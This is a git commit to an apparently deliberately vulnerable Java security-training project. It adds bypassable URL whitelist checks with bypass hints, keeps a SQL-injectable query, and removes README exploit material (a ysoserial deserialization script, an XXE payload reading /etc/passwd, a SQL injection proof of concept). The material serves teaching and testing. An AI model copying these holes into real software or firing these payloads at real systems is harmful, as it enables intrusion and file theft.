add url bypass

JoyChou93 · JoyChou93 · commit 85619f35f1ff · 2018-08-23T13:49:19.000+08:00
diff --git a/README.md b/README.md
@@ -18,6 +18,7 @@
 - [反序列化](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Deserialize.java)
 - [文件上传](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/FileUpload.java)
 - [SQL注入](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SQLI.java)
+- [URL白名单Bypass](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/URLWhiteList.java)
 
 ## 如何运行
 
@@ -61,121 +62,6 @@ http://localhost:8080/rce/exec?cmd=whoami
 Viarus
 ```
 
+### 漏洞说明
 
-## SSRF
-
-针对SSRF具体利用，可以阅读我写的[这篇博文](https://joychou.org/java/javassrf.html)。
-
-## 反序列化
-
-打包ysoserial
-
-``` 
-git clone https://github.com/frohoff/ysoserial.git
-mvn clean package -DskipTests
-```
-
-执行exp
-
-```python
-#coding: utf-8
-#author: JoyChou
-#date:   2018.07.17
-
-import requests
-import subprocess
-
-def poc(url , gadget, command):
-	ys_filepath = '/Users/Viarus/Downloads/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar'
-	popen = subprocess.Popen(['java', '-jar', ys_filepath, gadget, command], stdout=subprocess.PIPE)
-	payload = popen.stdout.read()
-	r = requests.post(url, data=payload, timeout=5)
-
-if __name__ == '__main__':
-	poc('http://127.0.0.1:8080/deserialize/test', 'CommonsCollections5', 'open -a Calculator')
-```
-
-## 文件上传
-
-目前这类漏洞在spring里非常少，原因有两点：
-1. 大多数公司上传的文件都会到cdn
-2. spring的jsp文件必须在web-inf目录下才能执行
-
-除非，可以上传war包到tomcat的webapps目录。所以就不YY写漏洞了。
-
-访问`http://localhost:8080/file/`进行文件上传，上传成功后，再访问`http://localhost:8080/image/上传的文件名`可访问上传后的文件。
-
-## XXE
-
-### 支持Xinclude的XXE
-
-2018年08月22日更新支持XInclude的XXE漏洞代码，详情见代码。
-
-POC
-
-```xml
-<?xml version="1.0" ?>
-<root xmlns:xi="http://www.w3.org/2001/XInclude">
- <xi:include href="file:///etc/passwd" parse="text"/>
-</root>
-```
-
-URL编码后的payload
-
-``` 
-http://localhost:8080/xxe/DocumentBuilder_xinclude?xml=%3C%3fxml+version%3d%221.0%22+%3f%3E%0d%0a%3Croot+xmlns%3axi%3d%22http%3a%2f%2fwww.w3.org%2f2001%2fXInclude%22%3E%0d%0a+%3Cxi%3ainclude+href%3d%22file%3a%2f%2f%2fetc%2fpasswd%22+parse%3d%22text%22%2f%3E%0d%0a%3C%2froot%3E
-```
-
-详情可以查看[浅析xml之xinclude & xslt](https://www.anquanke.com/post/id/156227)
-
-## SQL注入
-
-### POC
-
-访问`http://localhost:8080/sqli/jdbc?id=1' or 'a'='a`返回`joychou: 123 wilson: 456 lightless: 789`。
-
-正常访问`http://localhost:8080/sqli/jdbc?id=1`返回`joychou: 123`
-
-### 数据库表数据SQL
-
-```sql
-
-SET NAMES utf8mb4;
-SET FOREIGN_KEY_CHECKS = 0;
-
--- ----------------------------
--- Table structure for users
--- ----------------------------
-DROP TABLE IF EXISTS `users`;
-CREATE TABLE `users` (
-  `name` varchar(255) NOT NULL,
-  `password` varchar(255) NOT NULL,
-  `isAdmin` varchar(255) NOT NULL,
-  `id` int(10) NOT NULL AUTO_INCREMENT,
-  PRIMARY KEY (`id`)
-) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci;
-
--- ----------------------------
--- Records of users
--- ----------------------------
-BEGIN;
-INSERT INTO `users` VALUES ('joychou', '123', '1', 1);
-INSERT INTO `users` VALUES ('wilson', '456', '0', 2);
-INSERT INTO `users` VALUES ('lightless', '789', '0', 3);
-COMMIT;
-
-SET FOREIGN_KEY_CHECKS = 1;
-
-
-```
-
-### 说明
-
-SQL注入修复方式采用预处理方式，修复见代码。Mybatis的`#{}`也是预处理方式处理SQL注入。
-
-在使用了mybatis框架后，需要进行排序功能时，在mapper.xml文件中编写sql语句时，注意orderBy后的变量要使用${},而不用#{}。因为`#{}`变量是经过预编译的，${}没有经过预编译。虽然${}存在sql注入的风险，但orderBy必须使用`${}`，因为`#{}`会多出单引号`''`导致sql语句失效。为防止sql注入只能自己判断输入的值是否是否存在SQL。
-
-```sql
-select * from users order by 'id' desc  -- 排序无效，默认升序
-select * from users order by id desc   -- 降序
-```
+查看[漏洞说明文档](https://github.com/JoyChou93/java-sec-code/wiki/%E6%BC%8F%E6%B4%9E%E8%AF%B4%E6%98%8E%E6%96%87%E6%A1%A3)
diff --git a/pom.xml b/pom.xml
@@ -57,6 +57,12 @@
             <version>1.2.49</version>
         </dependency>
 
+        <!-- 获取url根域名-->
+        <dependency>
+            <groupId>com.google.guava</groupId>
+            <artifactId>guava</artifactId>
+            <version>21.0</version>
+        </dependency>
 
         <dependency>
             <groupId>com.google.guava</groupId>
diff --git a/src/main/java/org/joychou/controller/SQLI.java b/src/main/java/org/joychou/controller/SQLI.java
@@ -23,7 +23,7 @@ public class SQLI {
     @ResponseBody
     public static String jdbc_sqli(HttpServletRequest request){
 
-        String id = request.getParameter("id");
+        String name = request.getParameter("name");
         String driver = "com.mysql.jdbc.Driver";
         String url = "jdbc:mysql://localhost:3306/sectest";
         String user = "root";
@@ -38,14 +38,14 @@ public static String jdbc_sqli(HttpServletRequest request){
 
             // sqli vuln code 漏洞代码
              Statement statement = con.createStatement();
-             String sql = "select * from users where id = '" + id + "'";
+             String sql = "select * from users where name = '" + name + "'";
              System.out.println(sql);
              ResultSet rs = statement.executeQuery(sql);
 
             // fix code 用预处理修复SQL注入
-//            String sql = "select * from users where id = ?";
+//            String sql = "select * from users where name = ?";
 //            PreparedStatement st = con.prepareStatement(sql);
-//            st.setString(1, id);
+//            st.setString(1, name);
 //            System.out.println(st.toString());  // 预处理后的sql
 //            ResultSet rs = st.executeQuery();
 
diff --git a/src/main/java/org/joychou/controller/URLWhiteList.java b/src/main/java/org/joychou/controller/URLWhiteList.java
@@ -0,0 +1,101 @@
+package org.joychou.controller;
+
+
+import com.google.common.net.InternetDomainName;
+import org.springframework.stereotype.Controller;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.ResponseBody;
+
+import javax.servlet.http.HttpServletRequest;
+import java.net.URL;
+import java.util.regex.Matcher;
+import java.util.regex.Pattern;
+
+/**
+ * date: 2018年08月23日
+ * author: JoyChou
+ * desc: URL白名单绕过
+ */
+
+@Controller
+@RequestMapping("/url")
+public class URLWhiteList {
+
+
+    private String urlwhitelist = "joychou.com";
+
+
+    // 绕过方法bypassjoychou.com
+    @RequestMapping("/endswith")
+    @ResponseBody
+    public String endsWith(HttpServletRequest request) throws Exception{
+        String url = request.getParameter("url");
+        URL u = new URL(url);
+        String host = u.getHost().toLowerCase();
+        String rootDomain = InternetDomainName.from(host).topPrivateDomain().toString();
+
+        if (rootDomain.endsWith(urlwhitelist)) {
+            return "URL is legal";
+        } else {
+            return "URL is illegal";
+        }
+    }
+
+    // 绕过方法joychou.com.bypass.com  bypassjoychou.com
+    @RequestMapping("/contains")
+    @ResponseBody
+    public String contains(HttpServletRequest request) throws Exception{
+        String url = request.getParameter("url");
+        URL u = new URL(url);
+        String host = u.getHost().toLowerCase();
+        String rootDomain = InternetDomainName.from(host).topPrivateDomain().toString();
+
+        if (rootDomain.contains(urlwhitelist)) {
+            return "URL is legal";
+        } else {
+            return "URL is illegal";
+        }
+    }
+
+    // 绕过方法bypassjoychou.com，代码功能和endsWith一样/
+    @RequestMapping("/regex")
+    @ResponseBody
+    public String regex(HttpServletRequest request) throws Exception{
+        String url = request.getParameter("url");
+        URL u = new URL(url);
+        String host = u.getHost().toLowerCase();
+        String rootDomain = InternetDomainName.from(host).topPrivateDomain().toString();
+
+        Pattern p = Pattern.compile("joychou\\.com");
+        Matcher m = p.matcher(rootDomain);
+        if (m.find()) {
+            return "URL is legal";
+        } else {
+            return "URL is illegal";
+        }
+    }
+
+
+    // 安全代码
+    @RequestMapping("/seccode")
+    @ResponseBody
+    public String seccode(HttpServletRequest request) throws Exception{
+        String url = request.getParameter("url");
+        URL u = new URL(url);
+        // 判断是否是http(s)协议
+        if (!u.getProtocol().startsWith("http") && !u.getProtocol().startsWith("https")) {
+            return "URL is not http or https";
+        }
+        String host = u.getHost().toLowerCase();
+        // 如果非顶级域名后缀会报错
+        String rootDomain = InternetDomainName.from(host).topPrivateDomain().toString();
+
+        if (rootDomain.equals(urlwhitelist)) {
+            return "URL is legal";
+        } else {
+            return "URL is illegal";
+        }
+    }
+
+
+}
